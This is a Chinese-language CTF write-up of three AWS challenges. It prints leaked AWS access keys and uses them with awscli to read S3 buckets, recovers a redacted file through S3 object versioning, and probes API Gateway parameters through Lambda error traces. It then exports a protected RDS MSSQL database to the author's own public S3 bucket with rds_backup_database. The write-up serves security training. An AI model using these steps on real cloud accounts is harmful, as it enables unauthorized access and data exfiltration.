0x00 来自Infiltrate 2019隐藏关卡的题
首先来到Greetings from the AWS Infiltrate Booth! 看说明,提示第三个Challenge是隐藏的
Third challenge is..somewhere? Around here? Elsewhere? Who knows.
看源码找线索
$ curl http://infiltrate.s3-website-us-east-1.amazonaws.com/
在HTML的末尾看到一些AJAX请求
<script>
function g(text) {document.getElementById("heading").innerHTML="<h1>"+text+"</h1>";}
var awsimage=document.getElementById("AwsImage");
var xhr=new XMLHttpRequest();
// Promises, yo! Learn to use Promises!
xhr.onreadystatechange=function() { if (this.readyState==4 && this.status==200){ var results=JSON.parse(this.responseText); awsimage.src="https://"+results["bucket"]+"/img/"+results["image"]; } };
xhr.open("GET", "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1", true);
xhr.send();
g("Welcome!");
</script>
使用curl 请求下,发现返回了AWS Access Key ID 和 AWS Secret Access Key
$ curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1" |jq .
{
"field2": "5/S8sTjlK2R6rIPvyhVl8GdTGEAceii52dN7cBnl",
"image": "aws_1.png",
"field1": "AKIAYOLTDOPA46OXMUO2",
"bucket": "s3-us-west-2.amazonaws.com/c9092b7e-b87e-4aa8-ba59-67664c2133b1"
}
region可以通过dig cxwudbwxhc.execute-api.us-west-2.amazonaws.com
得知是us-west-2, 有了这些信息后,本地就可以配置下awscli了.
$ aws configure --profile infiltrate2019
AWS Access Key ID [****************MUO2]:
AWS Secret Access Key [****************cBnl]:
Default region name [us-west-2]:
通过查看S3,发现f6f61719-4736-4421-9775-ce7651ab25e2桶下有个backup.tgz和notes.txt文件。把这些下回到本地。
$ aws s3 sync s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/ . --profile infiltrate2019
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/notes.txt to ./notes.txt
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/backup.tgz to ./backup.tgz
Notes.txt文件里没有什么有意义的,解压backup.tgz后,发现有个saved_message.eml,使用outlook直接查看,是个空邮件,感觉有蹊跷,命令行下用cat查看
$ tar zxvf backup.tgz
x aws_1.png
x aws_2.png
x aws_3.png
x aws_4.png
x aws_5.png
x aws_6.png
x aws_7.png
x saved_message.eml
$ cat saved_message.eml
From: Alice <alice@example.com>
To: <bob@example.com>
Message-ID: <162228743.1958841594770323115.KittyKat@deliver.my.email.net>
Subject: Really necessary??
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_85228_1905676953.1554775383225"
iSightTracking: 6f0c16a3-032f-42eb-8741-68486d97ffcd
Date: Tue, 4 Apr 2017 02:03:03 +0000
X-EOPAttributedMessage: 0
Hey, Bob!
I'm still not sure that API is a good idea. You included all of those
function() functions to do useful things but I'm still thinking that
cowsay() was a bad move. Yes...I know that a bad guy would need to add
"cowsays=moo" for it to do anything but I think we should be *more*
security-conscious.
~ Alice
P.S. Maybe unicornsay()? I like unicorns.
根据saved_message.eml里的提示,替换function和参数访问API gateway, 又返回了另一个s3 bucket
curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=cowsay&cowsays=moo"
"\n< s3://83d9a67f-0e37-499b-b7ba-abd50bd82307 >\n \\ ^__^\n \\ (oo)\\_______\n (__)\\ )\\/ ||----w |\n || ||\n"
名为83d9a67f-0e37-499b-b7ba-abd50bd82307的bucket下只有一个instructions.txt文件,本地查看发现该文件的敏感内容都被REDACTED掉了
$ aws s3 sync s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/ . --profile infiltrate2019
download: s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/instructions.txt to ./instructions.txt
$ cat instructions.txt
Alice,
I stashed the goodies where you can find them! ;)
<REDACTED>
<REDACTED>
P.S. I'm sorry. The IT nerds told me to redact the above material. Apparently, it's a "security issue". :(
查看该bucket是否开启了versions功能,如果开启了,可以找回REDACTED前的版本.
$ aws s3api list-object-versions --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --profile infiltrate2019
{
"Versions": [
{
"LastModified": "2019-04-15T23:13:48.000Z",
"VersionId": "Biu1AbfSB8uE01qH1qzX0ECrv3apXCO_",
"ETag": "\"2afaecf2c80d67e1c0d1b0436836f21f\"",
"StorageClass": "STANDARD",
"Key": "instructions.txt",
"IsLatest": true,
"Size": 193
},
{
"LastModified": "2019-04-15T23:11:38.000Z",
"VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
"ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
"StorageClass": "STANDARD",
"Key": "instructions.txt",
"IsLatest": false,
"Size": 108
}
]
}
可以看到是有开启versions功能的,下载最早的instructions.txt回本地
$ aws s3api get-object --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --key "instructions.txt" ori-instructions.txt --version-id htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf --profile infiltrate2019
{
"AcceptRanges": "bytes",
"ContentType": "text/plain",
"LastModified": "Mon, 15 Apr 2019 23:11:38 GMT",
"ContentLength": 108,
"VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
"ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
"Metadata": {}
}
$ cat ori-instructions.txt
Alice,
I stashed the goodies where you can find them! ;)
function=ScumAndVillainy
MosEisley=<anything>
读取ori-instructions.txt后,根据提示,改变function来访问API gateway,得到最终的flag
$ curl "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=ScumAndVillainy&MosEisley=moo" -s | jq .
"flag{33e842a3-eaea-4b1e-8637-5cf6c686e0de}"
0x01 来自某CTF一道关于API gateway的题
挑战的描述很简单。获取邀请码,注册网站
还是先看搭建在S3 bucket上的静态HTML源码,就是一个包含登录和注册功能的页面。在HTML源码里发现AJAX请求到API gateway 以及一段被注释掉的HTML代码,根据alert判断,可以根据报错信息得到一些提示。
curl -s http://chanllenge1.s3-website-us-west-1.amazonaws.com/
<script type="text/javascript">
$(document).ready(function() {
$("#submit").click(function(e) {
e.preventDefault();
$.ajax({
type: "GET",
dataType: 'json',
crossDomain: true,
contentType: "text/plain; charset=utf-8",
url: 'https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/login?rolename=signin&extId=7369676E696E',
success: function(res){
},
error:function(xhr, ajaxOptions, thrownError){
alert('Lambda returned error\n\n remember, error are very useful!');
}
}); }) });
</script>
<!-- need to remove after testing: http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html -->
根据API Gateway的报错信息,可以得知,如果要获取到邀请码,需要rolename和extId, rolename根据路径信息和报错信息,推测应该就是invite了
curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/ |jq .
{"errorMessage": "'rolename'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_funcHon.py", 11, "lambda_handler", "rolename = str(event['query']['rolename'])"]]}
curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite {"errorMessage": "'extId'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_funcHon.py", 12, "lambda_handler", "extId = str(event['query']['extId'])"]]}
exitId是啥呢?接着访问 http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html, 发现返回如下文本信息
Operation Type Condition required?
signup signup user 7369676e757075736572
signin signin from admin pool 7369676e696e61646d696e
invite invite ? ?
使用burpsuite的“smart decode”功能尝试自动解码,最终发现
7369676e757075736572 通过ASCII HEX解码为signupuser
7369676e696e61646d696e 通过ASCII HEX解码为signinadmin
尝试把invite用ASCII HEX编码为,然后作为extID请求,获得最终的Flag
curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite&extId=696e76697465 | jq .
"CongratulaHons! flag is : CTF{1234_6666_2234_9999_0101} "
0x02 来自某CTF一道关于RDS的题
这个挑战直接给了一个软件调试的LOGS文件,通过LOGs文件可以发现MSSQL数据库的账号和位于us-west-1.rds.amazonaws.com.的主机名
使用Navicat去链接RDS, 查看RDS版本信息,可浏览的数据库,表。
SELECT @@version
Microsoft SQL Server 2017 - 14.0.3035.2 (X64)
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘flag’);
flag_id
可以看到flag表里的flag_id列因该就是包含我们flag的地方了,直接用Navicat浏览,提示没有查看权限。尝试看看有没有备份权限,如果有备份权限,直接将该数据库备份到S3,然后再本地还原。
先在自己的S3里新建一个public权限的S3 bucket,我这里叫sqlbackup,然后回到Navicat控制台,执行如下命令:
exec msdb.dbo.rds_backup_database
@source_db_name=‘secrets’,
@s3_arn_to_backup_to=‘arn:aws:s3:::sqlbackup/sql.bak’,
@overwrite_S3_backup_file=1,
@type=‘FULL’;
执行成功了,说明有backup的权限, 依赖于数据库大小,备份时间长短不一,用如下命令可以查看进度
exec msdb.dbo.rds_task_status @db_name=‘secrets’;
8 BACKUP_DB secrets 100 2 SUCCESS
[2019-03-11 13:25:22.013] Task execution has started.
[2019-03-11 13:25:22.110] 6 percent processed.
[2019-03-11 13:25:22.123] Processed 384 pages for database ‘wwi-secrets’, file ‘secrets’ on file 1.
[2019-03-11 13:25:22.140] 100 percent processed.
[2019-03-11 13:25:22.140] BACKUP DATABASE successfully processed 386 pages in 0.009 seconds (334.255 MB/sec).
[2019-03-11 13:26:22.013] sql.bak: Completing S3 upload, waiting for S3 workers to clean up and exit
[2019-03-11 13:26:22.183] sql.bak: Completed processing 100% of S3 chunks.
[2019-03-11 13:26:22.357] sql.bak: Final chunk written to S3 successfully.
[2019-03-11 13:26:22.360] sql.bak: S3 processing completed successfully
[2019-03-11 13:26:22.360] Command execution completed successfully. 2019-03-11 13:26:22.360 2019-03-11 13:24:26.526 arn:aws:s3::: sqlbackup/sql.bak 1
然后本地使用SQL管理器恢复sql.bak文件,就可以看到flag了